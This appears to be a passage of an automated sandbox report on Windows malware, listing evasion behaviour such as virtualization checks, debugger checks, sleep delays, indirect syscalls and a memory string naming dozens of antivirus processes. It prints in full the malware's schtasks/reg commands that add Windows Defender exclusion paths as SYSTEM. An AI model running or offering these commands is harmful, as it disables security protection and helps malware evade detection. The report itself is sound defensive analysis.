Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BF4B056
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BF4CBDE
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 6C638647
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BEDC0AF
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BE2F12B
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BE38B19
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BE92089
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 6C5C87AA
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BF58092
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BF09F9E
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BF282C1
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 6C6D7912
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	API/Special instruction interceptor: Address: 6C5D2089
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BF32F48
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BE7F839
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BED5F8C
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	API/Special instruction interceptor: Address: 6BF47912

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: {4E062DDA-444A-A2A8-84CE-E105F66A5AB3}SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEMCONSENTPROMPTBEHAVIORADMINSOFTWARE\PERFRPOOLSOFTWARE\PPFR49/56/235/24;9161POSTDATAC:\WINDOWS\SYSWOW64\DRIVERS\189ATOHCI.SYS360SAFE.EXE360SD.EXE360RP.EXE360RPS.EXESRAGENT.EXE360TRAY.EXEZHUDONGFANGYU.EXEKANKAN.EXESUPERKILLER.EXELIVEUPDATE360.EXEMODULEUPDATE.EXEFILESMASHER.EXEAGREEMENTVIEWER.EXESOFTMGRLITE.EXE360LEAKFIXER.EXE360SDRUN.EXE360SDUPD.EXE360FILEGUARD.EXEDEP360.EXEDUMPUPER.EXEDSMAIN.EXEDSMAIN64.EXEFIRSTAIDBOX.EXECHECKSM.EXEHIPSMAIN.EXEHIPSDAEMON.EXEHIPSTRAY.EXEHRUPDATE.EXEHIPSLOG.EXENETFLOW.EXEAUTORUNS.EXEUSYSDIAG.EXEWSCTRLSVC.EXEWSCTRL.EXEKXEMAIN.EXEKXESCORE.EXEKSCAN.EXEKXECENTER.EXEKXETRAY.EXEKDINFOMGR.EXEKISLIVE.EXEKNEWVIP.EXEKSOFTPURIFIER.EXEKTRASHAUTOCLEAN.EXEKAUTHORITYVIEW.EXETQCLIENT.EXETQEDRNAME.EXETQSAFEUI.EXETQTRAY.EXETRANTORAGENT.EXETQDEFENDER.EXETQUPDATEUI.EXETQWATERMARK.EXEDLPAPPDATA.EXENACLDIS.EXEMSMPENG.EXEMPCMDRUN.EXELDSHELPER.EXELDSSECURITY.EXELDSSECURITYAIDER.EXECOMPUTERZTRAY.EXECOMPUTERCENTER.EXEGUARDHP.EXECOMPUTERZ_CN.EXECOMPUTERZSERVICE.EXECOMPUTERZSERVICE_X64.EXEHDW_DISK_SCAN.EXECOMPUTERZMONHELPER.EXEDRVMGR.EXEWEB_HOST.EXE2345SAFECENTERSVC.EXE2345RTPROTECT.EXE2345SAFESVC.EXE2345MPCSAFE.EXE2345SAFETRAY.EXE2345SAFEUPDATE.EXE2345VIRUSSCAN.EXE2345MANUUPDATE.EXE2345ADRTPROTECT.EXE2345AUTHORITYPROTECT.EXE2345EXTSHELL.EXE2345EXTSHELL64.EXE2345FILESHRE.EXE2345LEAKFIXER.EXE2345LSPFIX.EXE2345PCSAFEBOOTASSISTANT.EXE2345RTPROTECTCENTER.EXE2345SHELLPRO.EXE2345SYSDOCTOR.EXELENOVOPCMANAGERSERVICE.EXELENOVOPCMANAGER.EXELAVSERVICE.EXELENOVOTRAY.EXELNVSVCFDN.EXEWSCTRL7.EXEWSCTRL10.EXEWSCTRL11.EXELENOVOAPPUPDATE.EXELENOVOAPPSTORE.EXEDESKTOPASSISTANTAPP.EXEDESKTOPASSISTANT.EXELENOVOMONITORMANAGER.EXELENOVOOKM.EXELEASHIVE.EXESTARTUPMANAGER.EXEWSPLUGINHOST.EXEWSPLUGINHOST64.EXECRASHPAD_HANDLER.EXESEARCHENGINE.EXELISFSERVICE.EXELSF.EXEAPPVANT.EXELENOVOINTERNETSOFTWAREFRAMEWORK.EXEEMDRIVERASSIST.EXELEAPPOM.EXEHOTFIXPLATFORM.EXEMSPCMANAGER.EXEMSPCMANAGERSERVICE.EXEAVP.EXEAVPUI.EXEAVASTSVC.EXEASWTOOLSSVC.EXEASWIDSAGENT.EXEWSC_PROXY.EXEAVASTUI.EXEAVIRA.SPOTLIGHT.SERVICE.EXEENDPOINTPROTECTION.EXESENTRYEYE.EXEAVIRA.SPOTLIGHT.COMMON.UPDATER.EXEAVIRA.SPOTLIGHT.FALLBACKUPDATER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.EXEAVIRA.SPOTLIGHT.SYSTRAY.APPLICATION.EXEAVIRA.OPTIMIZERHOST.EXEAVIRA.SPOTLIGHT.BOOTSTRAPPER.EXEAVIRA.SPOTLIGHT.SERVICE.WORKER.EXEAVIRA.SPOTLIGHT.COMMON.UPDATERTRACKER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.MESSAGING.EXEAVIRA.SPOTLIGHT.UI.ADMINISTRATIVERIGHTSPROVIDER.EXEMFEMMS.EXEMFEVTPS.EXEMCAPEXE.EXEMCSHIELD.EXEMCUICNT.EXEMFEAVSVC.EXENISSRV.EXESECURITYHEALTHSYSTRAY.EXEKWSPROTECT64.EXEQMDL.EXEQMPERSONALCENTER.EXEQQPCPATCH.EXEQQPCREALTIMESPEEDUP.EXEQQPCRTP.EXEQQPCTRAY.EXEQQREPAIR.EXEQQPCMGRUPDATE.EXEKSAFETRAY.EXEMPCOPYACCELERATOR.EXEUNTHREAT.EXEK7TSECURITY.EXEAD-WATCH.EXEPSAFESYSTRAY.EXEVSSERV.EXEREMUPD.EXERTVSCAN.EXEASHDISP.EXEAVCENTER.EXETMBMSRV.EXEKNSDTRAY.EXEV3SVC.EXEMSSECESS.EXEQUHLPSVC.EXERAVMOND.EXEKVMONXP.EXEBAIDUSAFETRAY.EXEBAIDUSD.EXEBKA.EXEBKA
Source: mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	RDTSC instruction interceptor: First address: 1400010D7 second address: 1400010ED instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 dec eax 0x00000004 shl edx, 20h 0x00000007 nop 0x00000008 dec eax 0x00000009 or eax, edx 0x0000000b nop 0x0000000c dec eax 0x0000000d mov ecx, eax 0x0000000f nop 0x00000010 fldpi 0x00000012 nop 0x00000013 frndint 0x00000015 nop 0x00000016 rdtsc
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	RDTSC instruction interceptor: First address: 1400010ED second address: 1400010ED instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 dec eax 0x00000004 shl edx, 20h 0x00000007 nop 0x00000008 dec eax 0x00000009 or eax, edx 0x0000000b nop 0x0000000c dec eax 0x0000000d sub eax, ecx 0x0000000f nop 0x00000010 dec ecx 0x00000011 cmp eax, ecx 0x00000013 nop 0x00000014 jc 00007FDE24743A96h 0x00000016 fldpi 0x00000018 nop 0x00000019 frndint 0x0000001b nop 0x0000001c rdtsc
Source: C:\Users\user\Documents\WchJz1.exe	RDTSC instruction interceptor: First address: 3AD2EC5 second address: 3AD2ED3 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc

Source: C:\Users\user\Documents\WchJz1.exe

Window / User API: threadDelayed 479

Jump to behavior

Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

Dropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sys

Jump to dropped file

Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_41-3272
Source: C:\Users\user\Documents\WchJz1.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_4-14096

Source: C:\Users\user\Documents\WchJz1.exe

API coverage: 2.7 %

Source: C:\Users\user\Documents\WchJz1.exe TID: 6900	Thread sleep count: 479 > 30	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe TID: 6900	Thread sleep time: -958000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe TID: 3384	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe TID: 3384	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe TID: 6900	Thread sleep count: 345 > 30	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe TID: 6900	Thread sleep time: -690000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe TID: 7036	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe TID: 7036	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Documents\WchJz1.exe	Last function: Thread delayed
Source: C:\Users\user\Documents\WchJz1.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\WchJz1.exe

Code function: 4_2_00007FFE11BDA1B8 FindFirstFileExW,

4_2_00007FFE11BDA1B8

Source: C:\Users\user\Documents\WchJz1.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Users\user\Documents\WchJz1.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: mm3ujg.exe, 00000027.00000002.2946744392.0000000000666000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
Source: WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Documents\WchJz1.exe	API call chain: ExitProcess graph end node			graph_4-14097
Source: C:\Users\user\Documents\WchJz1.exe	API call chain: ExitProcess graph end node			graph_4-14441

Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Documents\WchJz1.exe

Code function: 4_2_00000001400073E0 LdrLoadDll,

4_2_00000001400073E0

Source: C:\Users\user\Documents\WchJz1.exe

Code function: 4_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_0000000140007C91

Source: C:\Users\user\Documents\WchJz1.exe

Code function: 4_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_000000014000F000

Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Code function: 39_3_02330643 mov eax, dword ptr fs:[00000030h]	39_3_02330643
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Code function: 39_3_02330643 mov eax, dword ptr fs:[00000030h]	39_3_02330643
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Code function: 39_3_023300CD mov eax, dword ptr fs:[00000030h]	39_3_023300CD
Source: C:\Program Files (x86)\mm3ujg\mm3ujg.exe	Code function: 39_3_023300CD mov eax, dword ptr fs:[00000030h]	39_3_023300CD

Source: C:\Users\user\Documents\WchJz1.exe

Code function: 4_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,

4_2_0000000140004630

Source: C:\Users\user\Documents\WchJz1.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0000000140007C91
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00000001400106B0
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_00000001400092E0 SetUnhandledExceptionFilter,	4_2_00000001400092E0
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_00007FFE11BD2630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FFE11BD2630
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_00007FFE11BD1F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00007FFE11BD1F50
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_00007FFE11BD76E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00007FFE11BD76E0
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Code function: 41_2_008E10CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	41_2_008E10CC
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Code function: 41_2_008E2AE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	41_2_008E2AE2
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Code function: 41_2_008E51FB __NMSG_WRITE,_raise,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	41_2_008E51FB

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Documents\WchJz1.exe	NtAllocateVirtualMemory: Indirect: 0x140006FD0	Jump to behavior
Source: C:\Users\user\Desktop\T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	NtDelayExecution: Indirect: 0x1C94CC	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	NtProtectVirtualMemory: Indirect: 0x2A2B253	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	NtProtectVirtualMemory: Indirect: 0x2A7B253	Jump to behavior

Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Program Files (x86)\mm3ujg\mm3ujg.exe "C:\Program Files (x86)\mm3ujg\mm3ujg.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f	Jump to behavior

Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\programdata\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\users\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"c:\program files (x86)\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior
Source: C:\Users\user\Documents\WchJz1.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" cmd.exe /c schtasks /create /f /tn "task1" /sc once /st 00:00 /rl highest /ru "system" /tr "cmd.exe /c reg add \"hklm\software\microsoft\windows defender\exclusions\paths\" /v \"%userprofile%\documents\" /t reg_dword /d 0 /f" & schtasks /run /tn "task1" & schtasks /delete /tn "task1" /f	Jump to behavior

Source: C:\Users\user\Documents\WchJz1.exe

Code function: 4_2_00007FFE11BDFD40 cpuid

4_2_00007FFE11BDFD40

Source: C:\Users\user\Documents\WchJz1.exe	Code function: GetLocaleInfoA,		4_2_000000014000F370
Source: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	Code function: GetLocaleInfoA,		41_2_008E6B1A

Source: C:\Users\user\Documents\WchJz1.exe

Code function: 4_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

4_2_000000014000A370

Source: C:\Users\user\Documents\WchJz1.exe

Code function: 4_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

4_2_0000000140005A70

Source: WchJz1.exe, 00000004.00000002.2135734944.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kxetray.exe
Source: WchJz1.exe, 00000004.00000002.2135734944.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: vsserv.exe
Source: WchJz1.exe, 00000004.00000002.2135734944.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avcenter.exe
Source: WchJz1.exe, 00000004.00000002.2135734944.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: KSafeTray.exe
Source: WchJz1.exe, 00000004.00000002.2135734944.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: mm3ujg.exe, mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360safe.exe
Source: mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: SuperKiller.exe
Source: mm3ujg.exe, mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: msmpeng.exe
Source: mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: Autoruns.exe
